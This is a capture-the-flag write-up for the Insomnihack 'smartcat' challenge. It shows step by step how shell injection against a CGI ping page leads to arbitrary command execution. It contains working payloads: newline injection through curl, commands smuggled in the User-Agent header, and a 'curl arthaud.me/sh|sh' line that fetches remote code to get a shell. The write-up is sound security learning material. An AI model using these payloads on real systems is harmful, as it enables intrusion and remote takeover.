Outils pour utilisateurs

Outils du site


ctf:public:insomnihack-teaser:smartcat

smartcat - Writeup by Maxima

Challenge

Damn it, that stupid smart cat litter is broken again

Now only the debug interface is available here and this stupid thing only permits one ping to be sent!

I know my contract number is stored somewhere on that interface but I can't find it and this is the only available page! Please have a look and get this info for me !

FYI No need to bruteforce anything there. If you do you'll be banned permanently

http://smartcat.insomnihack.ch/cgi-bin/index.cgi

Solution

The web interface allows you to ping a domain name. This is the most basic example of shell injection. We can guess that the server runs something like ping -c 1 $dest. We will inject a separator to execute another shell command. I first tried:

google.com; ls
google.com | ls

But I got a Bad character error. It looks like some characters are forbidden. I finally found out that \n is allowed, so I could execute a space-free command using:

curl 'http://smartcat.insomnihack.ch/cgi-bin/index.cgi' -d 'dest=google.com%0Als'

That is nice! I also had the idea of using < − which is not blacklisted − to display the content of a file:

curl 'http://smartcat.insomnihack.ch/cgi-bin/index.cgi' -d 'dest=google.com%0Acat<index.cgi'

The next step is to get a shell. My idea was to use sh</tmp/myfile, but I first needed a way to write in a file. I finally found the command env that prints all environment variables.

curl 'http://smartcat.insomnihack.ch/cgi-bin/index.cgi' -d 'dest=google.com%0Aenv'

Because the server uses CGI, we have special environment variables containing the request parameters. We can use the user agent to inject a shell command:

curl 'http://smartcat.insomnihack.ch/cgi-bin/index.cgi?xxx' -A 'xxx echo Powned; exit 0' -d 'dest=google.com%0Aenv'

It returns:

CONTENT_TYPE=application/x-www-form-urlencoded
GATEWAY_INTERFACE=CGI/1.1
REMOTE_ADDR=89.234.156.87
QUERY_STRING=xxx
HTTP_USER_AGENT=xxx echo Powned; exit 0
[...]

It is a perfectly well formed shell script! Now we can basically execute any command using:

curl 'http://smartcat.insomnihack.ch/cgi-bin/index.cgi?xxx' -A 'xxx echo Powned; exit 0' -d 'dest=google.com%0Aenv>/tmp/pony7%0Ash</tmp/pony7'

Now it's easy to get the first flag:

find .
cat there/is/your/flag/or/maybe/not/what/do/you/think/really/please/tell/me/seriously/though/here/is/the/flag

For the second one, I used curl arthaud.me/sh|sh that gives me a real shell on my server. Then:

$ /home/smartcat/readflag
Almost there... just trying to make sure you can execute arbitrary commands....
Write 'Give me a...' on my stdin, wait 2 seconds, and then write '... flag!'.
Do not include the quotes. Each part is a different line.
$ (echo "Give me a..."; sleep 2; echo "... flag!"; cat) | /home/smartcat/readflag
Flag: 
            ___
        .-"; ! ;"-.
      .'!  : | :  !`.
     /\  ! : ! : !  /\
    /\ |  ! :|: !  | /\
   (  \ \ ; :!: ; / /  )
  ( `. \ | !:|:! | / .' )
  (`. \ \ \!:|:!/ / / .')
   \ `.`.\ |!|! |/,'.' /
    `._`.\\\!!!// .'_.'
       `.`.\\|//.'.'
        |`._`n'_.'|  hjw
        "----^----"

INS{shells_are _way_better_than_cats}

Author

Maxime Arthaud 2016/01/17 21:56

ctf/public/insomnihack-teaser/smartcat.txt · Dernière modification: 2016/10/15 20:11 par arthaum